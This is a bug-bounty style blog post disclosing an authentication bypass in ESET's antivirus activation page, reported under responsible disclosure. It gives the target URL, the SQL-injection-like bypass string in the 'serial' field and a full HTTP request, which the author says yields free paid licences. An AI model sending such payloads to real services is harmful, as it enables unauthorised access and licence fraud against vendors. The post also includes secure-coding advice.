A Hilarious ESET Broken Authentication Vulnerability (one click free purchase)

Hello Geeks and Security Evangelists,

My name is Mohamed Abdelbaset Elnoby, Just another Senior Information Security Researcher and Web Application Pentester in the world :D, Today I would like to show you a “hilarious” Broken Authentication bug I found on ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free.
(Yes “hilarious” is in bold, it’s not a formatting mistake but you will know why at the end of the story)

What is Broken Authentication?!

While most applications require authentication to gain access to private information or to execute tasks, not every authentication method can provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.

Besides, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:

In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
In the application deployment phase, there may be issues during the application setup (installation and configuration activities) due to a lack of required technical skills or due to a lack of good documentation.

Black Box testing:

There are several methods of bypassing the authentication schema that is used by a web application:

Direct page request (forced browsing)
Parameter modification
Session ID prediction
SQL injection

Here are in-depth details:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

Result!!

Each time you send the above request with the bypass string, guess what?! you will receive a free paid license of ESET Nod32 valid for 1 Year!! (Actually the yearly subscription costs $29.00 per user/request)

[*] Proof of Concept Video:

What to do?!

All that I need to do is to create a detailed report and address this “catastrophic” bug under their Responsible Disclosure rules and already did, but what is the previously mentioned “hilarious” thing here?!! :v

[*] Screenshots are louder than speech 😀

Behind the Scene!!

As this is black-box testing and there is nothing interested printed out as an output, I can’t even predict what was happening in the back-end but it’s a good thing at least for a bug hunter 😀 assuming that this is maybe a Full Blind SQL Injection, an authentication bypass, or even a broken authentication issue (the last one is a more realistic one) but what I’m sure of is that in a parallel world a programmer is having much of beer while handling the “If statement checks, input filtration, and database querying” and he got drunk enough to be trapped into my bypass.

[*] Nothing to be said here but rules are rules and must be respected, Thanks Daniel but I will keep my sense of humor for my CV 😀

Conclusion…

For my dear programmers’ friends, Don’t trust user-supplied inputs “filter all the things”, Stored procedures are safer, RTFM and finally don’t drink beer while coding, Peace. 😀